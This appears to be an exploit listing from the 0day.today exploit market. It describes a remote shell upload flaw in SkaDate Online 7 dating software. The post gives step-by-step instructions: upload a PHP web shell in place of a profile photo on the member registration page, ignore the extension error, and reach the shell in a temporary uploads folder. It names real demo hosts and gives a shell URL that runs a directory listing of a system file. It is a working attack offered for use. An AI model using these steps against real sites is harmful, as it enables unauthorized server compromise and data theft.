[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SkaDate Online 7 Remote Shell Upload Vulnerability

Author
ZoRLu
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4840
Category
web applications
Date add
11-02-2009
Platform
unsorted
==================================================
SkaDate Online 7 Remote Shell Upload Vulnerability
==================================================


[~] SkaDate Dating Remote Shell Upload
[~]
[~] Script: http://www.bpowerhouse.com/demos/traveling
[~] ----------------------------------------------------------
[~]
[~] Date:11/02/09
[~]
[~] My Best Friend: Dr.LY0N
[~] -----------------------------------------------------------


you go here : http://www.yildirim.com/demo/member/join.php

select your photo but photo must be your shell.php

after you saw this: unallowable file extension "php" but no problem

your shell here: http://www.yildirim.com/demo/$userfiles/tmp/[id].php

 
for demo:

here:  http://www.skadate.com/demo/member/join.php

shell: http://www.skadate.com/demo/$userfiles/tmp/0b3291151174726fefa04cfaf43fd2bc.php

dont forget: http://www.skadate.com/demo/$userfiles/tmp/0b3291151174726fefa04cfaf43fd2bc.php?act=ls&d=%2Fetc%2Fvdomainaliases



#  0day.today [2024-10-06]  #